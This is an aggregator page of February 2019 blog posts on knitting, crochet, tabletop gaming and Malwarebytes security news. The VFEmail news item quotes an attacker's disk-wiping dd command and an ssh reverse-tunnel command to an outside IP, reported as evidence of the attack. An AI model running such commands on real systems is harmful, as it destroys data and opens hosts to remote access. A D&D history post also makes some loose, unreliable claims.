Feed aggregator

Link Love: My Favourite Things This Week

Knitted Bliss - Fri, 02/15/2019 - 11:00

www.knittedbliss.com

My Favourite Articles and Links This Week In a recent interview on Dax Shepard’s podcast, Armchair Expert, his wife Kristen Bell shared a tip for combatting her depression: Before she allows herself to succumb to negativity, or get into a really bad mental space, she goes through a “to-do” list of action items she can do to

The post Link Love: My Favourite Things This Week appeared first on %%www.knittedbliss.com%%.

6
Categories: Knitting Feeds

Review & Commentary On 'The Pay What You Want' OSR Monster Book - The Found Folio Volume One By Jeremy Reaban

Swords & Stitchery - Fri, 02/15/2019 - 07:32
"Found Folio is a collection of roughly 130 monsters converted from 3rd edition (most notably the in print 3.75 edition) of the world's first fantasy roleplaying game back to 1st edition (and to an extent, original and other old school editions)."The Found Folio Vol I does exactly what it says on the tin. A collection of converted 3.5 monsters ready & willing to go into your latest adventure orNeedleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Astonishing Swordsmen & Sorcerers of Hyperborea Players' Manual By Jeffrey Talanian (author), David Prata (editor) From North Wind Adventures

Swords & Stitchery - Thu, 02/14/2019 - 20:46
"The heroes of a HYPERBOREA campaign delve the mazes and labyrinths of vast dungeons filled with horrifying monsters, lethal traps, and bewildering puzzles. They explore savage frontiers, breach hostile borderlands, probe ancient ruins, and investigate cursed tombs. They plunder for treasure and magic in a decaying world inhabited by bloodthirsty beasts and weird, otherworldly beings." Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Should you delete yourself from social media?

Malwarebytes - Thu, 02/14/2019 - 17:30

You’re feeling like you’ve had enough. All the recent news—from Facebook’s Cambridge Analytica snafu to various abuses of Twitter vulnerabilities—has you wondering: Should I delete myself from social media?

Social networking does have its positive aspects. You can stay in touch with distant (or not) relatives, be included in the planning of social events within your circle of friends, get real-time updates on regional and national news, and promote your company, content, or other personal ventures. Plus, you get to experience all the cool memes a full two weeks after they’ve been posted on Reddit.

Then again, there are quite a few reasons—spanning security, privacy, and overall shady business practices—for leaving. In 2018 alone, Facebook experienced a security breach that impacted 50 million accounts, was responsible for a genocide incited using its platform, kept user data it said it deleted, and was caught abusing Apple development apps to test on children. Twitter, meanwhile, has not only been at the butt end of password bugs, hacks, and data breaches, but some could say these days is a general dumpster fire of bot accounts.

Instagram and Snapchat are not without their flaws, either. Hackers are targeting influencer accounts on Insta, while Snapchat has been the recipient of phishing attacks and security breaches.

Unfortunately, we can’t make the decision to quit social media for you. Instead, we recommend you make a list of pros and cons. Consider what data might be lost. Consider what time and peace of mind might be gained. Weigh the rewards against the risks. If you come away feeling ready to take a step back, but not quite quit cold turkey, we can help you with ways to tighten security and privacy settings. And if that’s not enough, we’ll show you how to delete your accounts.

Let’s start slowly

If you’re not quite ready to cut the chord, a good option for cooling down on social media is to adjust the privacy settings on all of your accounts. This is a sensible thing to do, even if you aren’t considering leaving. It also has the bonus side effect of increasing awareness of just how much you share on social media.

In a previous blog, we discussed how to secure your social media profiles in great detail. We recommend users who aren’t deleting themselves read this first to understand the intricacies. Next, here’s a quick and dirty list of links to follow in order to adjust privacy settings across the top four social networking platforms:

After adjusting the settings, it’s a good idea to monitor and track your social media usage moving forward, either for the purpose of time management, focus, or beating social media addiction. As more and more of our media consumption moves to smart phones, you can leverage several apps that will help you achieve these goals. These include:

Goodbye, top four!

Let’s say you sat down, had a good think, and decided that it’s time to move on from social media. You can begin by collecting the appropriate links. Below, we’ve included links to download your data from the most popular platforms. You should download your personal information from these social networking sites prior to the nuclear option, should you experience remorse. Plus, it’s a real eye opener to find out exactly how much data you generate and share on social networking platforms.

Facebook

Time to permanent deletion: Once 14 days have passed, your deletion request will be started. This can take upwards of 90 days to complete.

Twitter

Time to permanent deletion: It takes up to 30 days for Twitter to completely delete your account.

Instagram

Time to permanent deletion: Immediately!

Snapchat

Time to permanent deletion: 30 days

Google+

Ha ha ha, ho ho ho, he he he he. This one is mostly for the giggles. Google will abandon this particular endeavor on April 2, 2019. But if you feel the need to delete yourself before then, here’s what to do:

The right time

Security researchers love social media platforms. They’re a vast source of open-source intelligence (OSINT) and help us make attribution possible (provided your adversary has poor OPSEC). However, the reasons we enjoy social media may also be the reasons why regular consumers should take a beat and consider the benefits.

When you’re ready to make a decision, we’ve given you all the necessary links to back up and delete these accounts, as well as some material that may help you decide which ones to keep, and how to properly secure them.

If social media is causing anxiety, stress, or depression; if you’re tired of your data being mined and shared with third parties; if it’s starting to feel more like work to maintain instead of pleasure, then it may be time to shore up defenses and take a break, or even step away for good. And if that time comes, we’re here for you.

The post Should you delete yourself from social media? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hacker destroys VFEmail service, wipes backups

Malwarebytes - Thu, 02/14/2019 - 16:56

An email service called VFEmail was essentially put out of business after a hack intended to delete everything in (and out of) sight.

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

This wasn’t “just” a simple webpage compromise, or some sort of database dump. In fact, it was something altogether quite worse. Put simply, the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s website:

Click to enlarge

!!!ALERT!!!! Update Feb 11 2019

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being delivered.

Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.

Mailboxes are new, no subfolders exist.

No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need. 

Click Filter, Click Script, then click ‘Activate Script’.

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.

If you reconnect your client to your new mailbox, all your local mail will be lost.

Ouch.

Did they put word out on social media?

You bet they did, and the Tweets don’t make for pleasant reading:

This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.

— VFEmail.net (@VFEmail) February 11, 2019

Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N

— VFEmail.net (@VFEmail) February 11, 2019

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is indeed over.

Did they recover?

Sadly things didn’t improve, and a few hours later the full damage report was available:

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there.

— VFEmail.net (@VFEmail) February 11, 2019

All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed:

Yep, but it doesn't matter. They just formatted everything.

— VFEmail.net (@VFEmail) February 11, 2019

They also managed to destroy various VMs using different forms of authentication.

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.

— VFEmail.net (@VFEmail) February 11, 2019

“Just attack and destroy”

Services and sites have been attacked severely in the past, some to the point of destruction. However, there’s almost always an overt reason given, or a ransom, or some other clue.

Here, it’s nothing but complete devastation and a service in existence since 2001 absolutely ruined in the bargain. There’s no indication as to how they got in, or if an important system had no multi-factor authentication. A number of commentators have suggested this flaw may have been a way in for the attacker.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime.

The post Hacker destroys VFEmail service, wipes backups appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Love Knot, aka Solomon’s Knot Crochet, by Linda Dean – Guest Tutorial

Moogly - Thu, 02/14/2019 - 16:00

There are so many amazing crochet designers and teachers out there, I like to take the chance to highlight them when I can – so today I’m sharing a guest tutorial by my good friend and amazing crocheter Linda Dean! Linda Dean blogs at Linda Dean Crochet and Linda designed the 2nd square for the [...]

The post Love Knot, aka Solomon’s Knot Crochet, by Linda Dean – Guest Tutorial appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

2
Categories: Crochet Life

Bring on the magic!

Torchbearer RPG - Thu, 02/14/2019 - 14:00
The Magic Circle by John William Waterhouse, 1886

Hello friends!

Let’s talk about magic items. If you’re a GM, are you placing them in your adventures? If you’re a player, are your characters finding them in their delves? I hope so!

Magic items are fun to discover and use, and if you treat them as more than contextless powerups they can inject history and weight to your campaign.

First, I should note the way I present magic items in Torchbearer has shifted a bit over the years. In the core book, items had levels and you had to be of the requisite level to use the item. I’ve since tossed that restriction by the wayside because it’s artificial and cumbersome. The magic items in Middarmark don’t have levels. That’s why.

It’s my hope that dropping the level restriction also makes it easier for you to design your own magic items and drop them in your games. To help get you started, here are the various magical effects a magic item can provide. If I’ve missed something, let me know in the comments and we’ll discuss!

Magical effects:

  • Break ties in your favor
  • Confer belief
  • Confer instinct
  • Confer special ability (fly, remain unharmed by fire, walk on water, etc.)
  • Confer spell effect
  • Confer traits
  • Confer wise
  • Increase Might
  • Provide advantage to abilities
  • Provide advantage to skills
  • Treat conditions

You can use these singly, or in combination to create more complex magic items. For instance, you can use the Confer belief, instinct, or trait effects in combination with something else to create a cursed item, or an item with a personality that weighs upon the bearer. In general, Confer belief and Confer instinct should replace the character’s existing belief or instinct, not add to it.

Try to give each item you introduce into the game a bit of lore, even if you’re using one from a book or adventure. What’s its name? Who made it? Why? What little nugget of history can your players discover by studying the item? Even a lowly ring of invisibility might have an epic history behind it.

Back in November, I posted a few new magic items. Here are some more to whet your appetite. What’s their story? How would you use them in your game?

Aegis Bracer

These leather bracers are crafted from a combination of supple leather, rawhide and boiled leather, all intricately burned with arcane sigils of defense. They protect the hands and forearms.
Effect: If you are targeted by a successful Attack or Feint in a capture, drive off or kill conflict, roll a d6. On a 4+, reduce your opponent’s margin of success by -1s. This effect works once per conflict. Attacks or Feints with spears, bolts and arrows are not affected.
Inventory: Hands/worn 1
Type: Magical clothing

Frostreaver

A sword of pale blue metal covered in fine crystalline hoar frost. The sword emits a powerful chill and a faint frosty vapor rises from it when unsheathed in above-freezing temperatures.
Effect: The subject of a successful Attack with Frostreaver is chilled to the bone, suffering -1s to their team’s next action. Frostreaver otherwise confers the normal sword benefits. Frostreaver’s cold is punishing. The wielder must wear thick leather gloves or similar protection to shield the hands or suffer the injured condition at the end of a conflict or turn in which it was used.
Inventory: Hands/carried 1 or belt/weapon 1
Type: Magical weapon

Jade Diadem

A crown of creamy white jade made for an ancient tyrant surrounded by scheming courtiers.
Effect: The wearer is immune to all mind control effects and gaze weapons.The wearer of the Jade Diadem gains the Suspicious trait at level 2. The wearer of the Jade Diadem is deeply suspicious of all who would approach them. It is extremely difficult to trick or lie to them, but they have a hard time trusting even the most altruistic people.
Inventory: Head/worn 1 or pack 1
Type: Magical jewelry

Keep Your Eyes Open

As a final note, as part of the #ZineQuest initiative on Kickstarter I plan to launch a new Torchbearer adventure on Sunday, February 17. It will join The Grind, another Torchbearer zine by our friends at Mordite Press. Check in here for announcements!

Categories: Tabletop Gaming Blogs

The Empire and Venus

Sorcerer's Skull - Thu, 02/14/2019 - 12:00
This is a follow-up to this post

Perhaps no planet in the Solar System has benefited more from the benevolent hand of the Earth Empire than Venus. The thick covering of clouds obscures modernization on a grand scale, and a planet moving from ignorance and savagery to progress and industry!

Looks a bit draft, doesn't it? The barracks are heated!
The mist-enshrouded cloud forests of the Venusian Highlands are home to a hairy race of primitive tribesmen, known to Earth explorers as "Woollies." The Woollies historically lived in crude, wooden huts, high up in trees to escape the numerous Venusian predators, but the Imperial Development Corps has helped them transition to secure reservations, with many modern Earth comforts. The grateful Woollies are eager to help the war effort against the rebellion, and the Imperial Army lets the well-meaning but unskilled primitives pitch in with menial tasks!

In the lowlands, the reptilian predators are even larger, making colonization and development hazardous. The Empire has granted Venusian Timber an exclusive contract to clear away those forests and eradicate the monstrous beasts, all in the name of a better tomorrow.

Watch out, there's one of them, now!Everyone has heard the stories of the green gnome of the Venusian swamps. Well, there have been reports of rebel activity in the area, too, and the government worries this eccentric old Venusian might be in danger! Imperial troops are looking for the little, old alien and hope to relocate him to safety, soon! Good searching, trooper!

They're gonna find you, little guy. Bet on it!

1270

Looking For Group - Thu, 02/14/2019 - 05:00

The post 1270 appeared first on Looking For Group.

Categories: Web Comics

Businesses: It’s time to implement an anti-phishing plan

Malwarebytes - Wed, 02/13/2019 - 16:54

Businesses: phishers aren’t just coming for you. They’re coming for your employees and your customers, too.

Phishing attacks are on the rise this year, thanks in part to massive Emotet and TrickBot campaigns, which make use of phishing emails to deliver their payloads. If you don’t already have one in place, then it’s time to implement an anti-phishing plan.

Where phishes are concerned, it doesn’t matter if the technique being used is revolutionary or old hat. Somebody, somewhere is going to fall for it. It’s up to you and your employees to ensure that your business is secure, and that your customers are performing safe email practices, too.

If your customers are logging into fake portals, eventually they’re going to tie up your support channels asking for help, refunds, reorders, and more. If your employees are being stung, they open the door to data theft, network infiltration, ransom demands, spying, and a massive dent in your company’s reputation to boot.

All of these are poor directions to head in. So let’s first take a look at some of the targets of phishing campaigns. Then, we’ll talk about what your employees and customers can do to identify a phish.

Targets for phishers

The 2018 Phishing Trends & Intelligence Report (PDF) from PhishLabs stated that Email/Online Services were the top targeted industry in the second half of 2017 by a margin of 26.1 percent, with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages.

Office 365 is enormously popular for businesses, with Microsoft revealing in 2016 that is has:

  • 60 million active commercial customers
  • 50,000 small business customers added every month
  • 340 million downloads of its mobile app

As our 2019 State of Malware report shows, there’s no real sector of industry left alone by malware attackers. Trojans (which include Emotet and TrickBot) lured in targets in manufacturing, education, and retail in 2018 with phishing emails. And ransomware, which is also a popular payload of phishing attacks, crippled organizations in government, as well as education, manufacturing, retail.

Outside of those verticals, however, phishers know that every business is sitting on something juicy: personally identifiable information (PII). Just about any organization in any vertical is sitting on databases of customer names, emails, and their payment details.

That’s a huge number of potential targets at which to aim.

What should we do?

While it’s nearly impossible to predict every threat model, or what an attacker may want with your company’s data, you can better thwart phishing attacks by putting in place a clear anti-phishing plan. There’s never been a better time to start beefing up your cybersecurity policy for employees, as well as update your website with solid anti-phishing tips for your customers.

If you’re short of a few ideas on how to help your employees and customers identify phishing attempts, we have a handy introductory list below.

Anti-phishing tips for your employees
  1. Attachments aren’t always a guarantee of malware. Often, phishers will send perfectly clean files as an additional confidence trick. “Please fill this in and send it back,” they’ll say. Having said that, many phish campaigns will happily try to backdoor a network with a rogue file alongside a phish attempt. When in doubt, do not open the file. Instead, try to contact someone you know from the organization listed in the email to confirm.
  2. Mobile devices are particularly at risk from lengthy scam URLs, as the visible portion may be tailored to appear legitimate, but the rest of it—which would give the game away—is hidden offscreen. Employees checking email on their phones or browsing the Internet should always review the whole URL before clicking. If it looks suspicious, or uses numbers or peculiar letters in place of what you’d expect to be there, it’s best to leave immediately.
  3. Dubious apps are also a potential problem, so it’s best to review apps you plan to install on your work mobile device or desktop with a hawk eye. Are the logos the same? Does the user experience match what you’d expect?
  4. Promoted content on social media can lead to phishing, and it’s worth advising all employees and customers to be wary of this—especially as ads tend to be targeted to your interests (thanks, trackers). While you may not want to prohibit use of social media at work entirely (especially as it’s part of the job for many folks in marketing), recommending that users not engage on social media from work devices, or limiting their engagements to work-specific tasks, could help thwart phishing attempts.
  5. Bit of a niche one, but you may wish to advise employees not to waste spammer’s/phisher’s time with any of these tactics during work hours. Using personal accounts is all fun and games, but replying with anything work-related could go terribly wrong. The bad guys know your work mail exists for one thing, and they’ll either spam it hard, send you more junk, or go after your business even more than they were already.
Anti-phishing tips for your customers
  1. Look at some anti-phish pages from the biggest brands. You’ll notice that they all mention the most obvious forms of attack. If you’re eBay, you’re going to see customers sent fake auction missives, or “problem with your auction” attacks. If you’re Steam, it’ll be “problems with your marketplace item” or free game keys. A bank? it’ll be bogus re-authentication mails. For Apple, it’ll be issues with pending refunds for items they don’t remember purchasing. This is how you should lead the charge.
  2. Point out that the presence of a padlock isn’t a guarantee the site they’re on is real. Certificates for websites are easily obtained for free these days, and scammers are taking full advantage of it. It may have been useful to tell people “Avoid sites with no padlock because it isn’t real” years ago, but the game has changed and so must our messaging.
  3. Warn them about bad spelling, errors in formatting, and email addresses in the “From” field which look suspicious. Also mention that many phishers spoof mails in the “From” field so this isn’t a guarantee of safety either. Perhaps the formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. The possibilities are endless.
  4. Desperation is a surefire sign that something may be wrong. It’s panic buying, but not as we know it. Emails claiming a tight time limit to login and perform an action, alongside the threat of losing X or Y forever, is a good sign of bad things afoot.
  5. Warn them off emails asking for additional personal information (and if your organization sends such emails, try to wean yourself off this practice, too). Links to sites asking for logins is bad practice. Train your customers and employees out of this habit. If they won’t click links asking for information, the battle is halfway won.
  6. The URL shown on the email and the URL that displays when you hover over the link are different from one another. An oldie, but goodie.
My business uses Office365, what else can I do?

Microsoft has a handy list of security suggestions for you to deploy on your network. Suggestions include:

And finally

Google has come up with a short, fun, and difficult anti-phishing test. It’s a fantastic way to experience some common phishing techniques safely. There aren’t many ways to experience real phishing examples in a safe environment, so it’s well worth having a go. You’ll likely find that there’s a few tactics in there you haven’t seen before, and it’s always a good idea to test your employees on some left-field phishing techniques. However you choose to go about putting together an anti-phishing plan for your organization, we wish you many years of safe emailing ahead.

The post Businesses: It’s time to implement an anti-phishing plan appeared first on Malwarebytes Labs.

Categories: Techie Feeds

“Shh… I’m Counting” Iron-On for Socks, Totes, and More Giveaway

Moogly - Wed, 02/13/2019 - 16:00

Recently I shared a Quick Cricut Craft: “Shh… I’m Counting” Socks. They are a lot of fun, but of course, not everyone owns a Cricut – so I’m giving away premade iron-on sheets to 5 very lucky winners here on Moogly! Disclaimer: Materials provided by Cricut but all opinions are my own. If you do [...]

The post “Shh… I’m Counting” Iron-On for Socks, Totes, and More Giveaway appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

2
Categories: Crochet Life

Wednesday Comics: Black Book: The Art of Jim Starlin

Sorcerer's Skull - Wed, 02/13/2019 - 12:00
Preempting my return to Storm this week was the fulfillment of the Ominous Press Kickstarter, Black Book: The Art of Jim Starlin. It's available for preorder now from the Ominous Press site. it includes images (mostly black and white but some color) from over his career and at the Big Two and independents.

We get to see his original image of Thanos:


And unpublished stuff from an as yet unfinished (tragically, never to be finished by Starlin alone) new Dreadstar story:


It does tend to skew a bit toward more recent material rather than his heyday, but has some images of stories or characters that never saw print, including work he did on a Captain Marvel (the Shazam! one) limited series.

If you are a Starlin fan, it's something you'll want to pick up.

An Age Undreamed of With Jason Vey's Free OD&D Booklet Age of Conan For Your Old School Campaigns

Swords & Stitchery - Wed, 02/13/2019 - 03:17
"When I was a fighting-man, the kettle-drums they beat, Under the caverned pyramids great Set coils asleep; When the world was young and men were weak, and the fiends of the ight walked free; I strove with Set by fire and steel and the juice of the upas-tree; What do I know of cultured ways, the gilt, the craft and the lie? -Robert E. Howard, “The Phoenix on the Sword” "So I've been down in Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Faith & Fortune - Fighters, Wizards, & Priests In Your Old School Campaigns

Swords & Stitchery - Tue, 02/12/2019 - 20:43
When we start looking at original Dungeons & Dragons clerics then we're getting right into the heart of the bed rock of the game in many ways. Clerics are so much more then their given credit for. Back in the Seventies &  Eighties clerics & their churches as well as the temples were the center pieces of adventures. Clerical orders were the movers & shakers among kings, queens, & royals. They Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Top Dungeons and Dragons News

Hack & Slash - Tue, 02/12/2019 - 16:30
We should remember the past, lest. . .

If it were a fad, you wouldn't be reading about it right now.
Dungeons & Dragons was always a fast starter. The first printing of 1,000 copies were gone in just a few months. That print run was doubled and sold out even faster the second time. The popularity was synergistic. Due to a mixup with rights involving The Hobbit and Lord of the Rings—Donald Wollheim of Ace Paperback was upset because Tolkien snubbed him when he asked to print Hobbit and Lord of the Rings in paperback. When their limited 5 year license to print them ran out, he just decided that it was public domain and began publishing it illegally. In order to stop this, in the late 60's they ran a huge publishing campaign to assert their rights in the united states, making the lord of the rings a very popular book in the early 70's. The themes in the book and the rising counterculture of the time made the seminal fantasy novel a nationwide phenomenon.
A lot of that popularity contributed to the fast success of Dungeons and Dragons, which in turn began to spawn more fantasy novels. With distribution channels in bookstores, gas stations, sears, and cheap child friendly books (Moldvay/Cook and Mentzer Basic) along with ads in boy's life and other teenage magazines, it sold millions of copies. 12.9$ million dollars worth in 1981—That's almost 50 million dollars in 2019 money.
It was the first D&D boom, and for many years, was the largest.

Money TroublesOne of the reasons Dungeons and Dragons was able to get into so many distribution channels is that they were sitting on a large pile of money, and therefore willing to take the risk of distributing to bookstores. If a book didn't sell, you could return the cover for your money back. Once control of the game was wrested away from the Gygax family, by the selfish and despicable Blume brothers, everything changed. No longer were they interested in employee feedback. Through a series of poor business decisions, and a rumor of a large stock of suddenly returned books (from Sears, iirc.) in the late 90's, Dungeons & Dragons found itself solidly in the red.
But like anything wonderful and good that asks nothing of the world, people remember and give back. Turns out, Dungeons and Dragons was a fan favorite, A long time player and creator of a cardboard based drug that prints money, Richard Garfield, decided Wizards of the Coast would purchase D&D. They did so, changed the corporate environment, immediately made a series of good business decisions and began to work on 3rd edition Dungeons and Dragons.


Third edition is coming. . . .In the late 90's Dungeons and Dragons was dead. In addition to releasing more and more tone-deaf supplements that sold worse and worse, modern gamers had made all their complaints about Dungeons and Dragons that weren't understood by the gaming public. They had grown up with Dungeons and Dragons, and everyone had moved to the more mature and adult role playing game "Vampire: The Masquerade". In addition to being a bizarre synthesis of of the most overbearing aspects of 'narrative second edition play' (i.e. illusionism, or railroading), it also had a cool cache, and it was a fair sight easier to hook up after a vampire game then the nerdy Dungeons and Dragons.
But in late 1998, rumors began—a new edition of Dungeons and Dragons? I perused the neophyte site EN world sometimes more than one time a day for details.
And it didn't disappoint. It was released, along with the D20 license allowing Dungeons and Dragons to flourish as content came out. But even from the release of the Sunless Citadel the path we are on began to form. Characters complained about the open dungeon, and the monsters that were stronger or weaker than what the low-level party could handle, leading to design that increasingly became more mechanical, linear, and focusing on the slaying of monsters. (Literally, "We couldn't kill the roper because it's too difficult for a low-level party", of course? That's the idea of risk versus reward and thinking creatively?)

Nothing lasts forever. . .Fourth edition was eventually announced. The game had become weighty and the people that played online spent their wrath in character optimization boards arguing endless spherical cows. Adikson had left, the D20 glut had gutted sales, and it was time to move forward. A new game was designed, creating lists of powers—with copyrightable names, of course—and planned integration with online tools. Unpopular races like gnomes were removed, and tieflings and dragonborn were made core (because people really like playing half-demons and dragon/lizard people. It's a fetish.) Since people were playing it like a tactics game, they designed it like one. Healing surges, powers with cooldowns, and more.
Many people would say that it was disconnected rules or that the change was too radical. I don't think that's true. I wasn't excited about 4th edition, but I played it, a lot. It was just really bad. Even when they tried to correct it later in official materials, it was too little, too late. Combats with creatures or opponents with hundreds of hit points, exhaust all your powers (which were printed on cards), and then left with each person doing their damage or missing to chip away at the ridiculous hit point totals. It was not a fast process, and in fact during one combat, I just went ahead and calculated our average damage per round and figured out, on average, how many rounds it would take to deplete the boss's hit points. The Dungeon Master, campaign setting, and all the rest was fine. I was playing with reasonable people, we just kept having. . . problems. I had a lazer that blew things up because that's something paladins could do in fourth edition. But you couldn't shoot anything that wasn't an enemy in combat There were issues with skill challenges (understatement) and thinking through the effects on the spell list created an untenable reality. In the first printing, speak with dead allowed the caster to communicate with anything that had died in the area, no matter how long ago. Basically there were a million undead in a sensor network that any mage could take ten minutes to ask a question. Strangeness abounded; poorly thought out design lead to the games eventual doom, but it wasn't the only nail in the coffin.

Murder and suicideThat wasn't the worst news to come out of the 4th edition debacle. Originally their marketing plan was to distribute "patches" to the ruleset and require a paid subscription to an online tool to create characters. The rules were designed to be integrated into a true virtual table top that would allow play in much the way modern virtual table tops such as Fantasy Grounds do. Sadly, the direct of the project suffered a breakdown when his wife filed for divorce, and he killed her, then himself.
I doubt it would have changed anything in regards to 4th edition but it never even had a chance after the virtual table top plan collapsed.

 Though the most famous Dungeons and Dragons news story of all time, has to be the Patricia Pulling story. Very simply put, she had a bright intelligent son, who suffered from a psychotic break. He began barking and acting like a wolf, killing animals in their backyard. He soon committed suicide. Ms. Pulling claimed that her son died because of a Dungeons and Dragons curse. She brought lawsuits against his school, TSR inc, and more. They were thrown out of court for being meritless. She then began a campaign of lies and disinformation that lasted years.
She was a confused angry lady. She once claimed that 8% of people were satan worshipers because she estimated 4% of kids were and 4% of adults were and if you add them together you get 8%. When it was pointed out to her that this isn't how math works—not even addressing her claim is a made up estimate—she said it didn't matter because 8% of everyone being a satan worshiper was a conservative estimate. Her organization, Bothered about Dungeons and Dragons, died out when she did, in 1997, but the world had moved on in 1990.

Today Dungeons and Dragons is riding the wave of popular culture, and hopefully will be producing rich fantasy worlds for generations to come.

Hack & Slash FollowGoogle +NewsletterSupportDonate to end Cancer (5 Star Rating)



Categories: Tabletop Gaming Blogs

Sanctum Sanctorum

Torchbearer RPG - Tue, 02/12/2019 - 16:00
We come bearing news

Fair friend,
We write to you now to say that we have missed you, and that we are sorry for having abandoned you to the cold, unfriendly climes of the internet. 

But, as penance, we have labored long and in secret to recreate our tiny fallen kingdom. Behold, the new Burning Wheel HQ forums!

  • If you are new to the forums, click Sign Up to create a new account.
  • If you had an account but never posted, your account was lost in the great purge. You’ll have to sign up again.
  • If you are a veteran of the forums, click Log In and click I Forgot My Password. Your password has been purged, but you can create a new one and recover your account.

Once your account is set up, join us in reading and posting about Burning Wheel, Torchbearer, Mouse Guard, Dungeon World, Burning Empires and even FreeMarket. We look forward to your coming home.

Spread the word!

If you’d like to see one of Luke’s weird (obsessive) side projects, check out his new Miseries & Misfortunes campaign live on Kickstarter until February 16th.

I hope you all have been following the #ZineQuest initiative on Kickstarter. It’s been great fun. For example, check out this sweet Torchbearer zine, The Grind, by our friends at Mordite Press.

Not to be outdone, Thor has plans to announce a zine project for a new Torchbearer adventure scenario on February 17. You can follow me on Kickstarter for launch notifications or await the arrival of the goblin we’re sending to your house with a special message.

Until next time!
Extra Rotam Nulla Salus
—Luke, Thor & BWHQ

Categories: Tabletop Gaming Blogs

Exploit kits: winter 2019 review

Malwarebytes - Tue, 02/12/2019 - 16:00

Active malvertising campaigns in December and the new year have kept exploit kit activity from hibernating in winter 2019. We mostly observed Fallout and RIG with the occasional, limited GrandSoft appearance for wider geo-targeting.

In addition, narrowly-focused exploit kits such as Magnitude, Underminer, and GreenFlash Sundown stayed on the same track: delivering ransomware to mostly Asian countries, and South Korea in particular.

Winter 2019 overview
  • Fallout EK
  • RIG EK
  • GrandSoft EK
  • Magnitude EK
  • Underminer EK
  • GreenFlash Sundown EK

Internet Explorer’s CVE-2018-8174 and Flash’s CVE-2018-4878 continue to be the most common vulnerabilities across the board, even though a couple exploit kits have now integrated the newer Flash CVE-2018-15982.

Fallout EK

Fallout keeps bringing fresh air into an otherwise stale atmosphere by introducing new features and even adopting newer vulnerabilities. It also appears to be a good experimental framework for some actors who have customized the payload delivery. Fallout was the second exploit kit to add CVE-2018-15982, a more recent vulnerability for the Flash Player.

RIG EK

Good old RIG is still kicking around, but has taken a back seat to the newer Fallout in many of the malvertising chains we track, except perhaps for Fobos. There haven’t been any notable changes to report since we last reviewed it.

GrandSoft EK

GrandSoft and its Ramnit payload still go hand-in-hand via limited distribution tied to compromised websites. It is perhaps one of the least sophisticated exploit kits on the market right now.

Magnitude EK

Meanwhile, Magnitude EK is active and served up via malvertising chains, with a focus on some APAC countries like South Korea. Magnitude continues to deliver its fileless Magniber ransomware payload.

Underminer EK

Underminer’s over-the-top encryption schemes to hide its exploits are keeping us researchers honest when trying to identify exactly what is under the hood. It’s worth noting that only a few days after the Flash zero-day and Proof of Concept (PoC) had been published (CVE-2018-15982), Underminer was already implementing it.

GreenFlash Sundown EK

Also a geo-specific exploit kit, GreenFlash Sundown has been delivering various breeds of ransomware to targets in Asia. In our latest capture, we saw it drop the Seon ransomware on South Korean users.

Mitigation

While timely patching and avoidance of Internet Explorer as a web browser would offer protection against the above-mentioned exploit kits, the reality is that many users (especially in corporate environments) are still trailing behind. In addition, while IE is being phased out in North America, it’s still highly adopted in Asian countries—which explains why they are currently being targeted.

Malwarebytes’ anti-exploit technology blocks each of these exploit kits—Fallout, RIG, GrandSoft, Magnitude, Underminer, and GreenFlash Sundown—before they even have a chance to drop their payload.

As we move further into 2019, we can say that exploit kits, while nowhere near their peak activity in 2017, are still hanging on, being used primarily in malvertising distribution campaigns. In terms of global activity, Fallout is leading the charge, providing the most diverse campaigns and payloads. Meanwhile, the Asia-specific EKs are for the most part continuing on with their usual pattern of driving innovation (to a degree) and distributing ransomware.

The post Exploit kits: winter 2019 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

8 Thoughts About D&D From Winter Fantasy

DM David - Tue, 02/12/2019 - 12:20

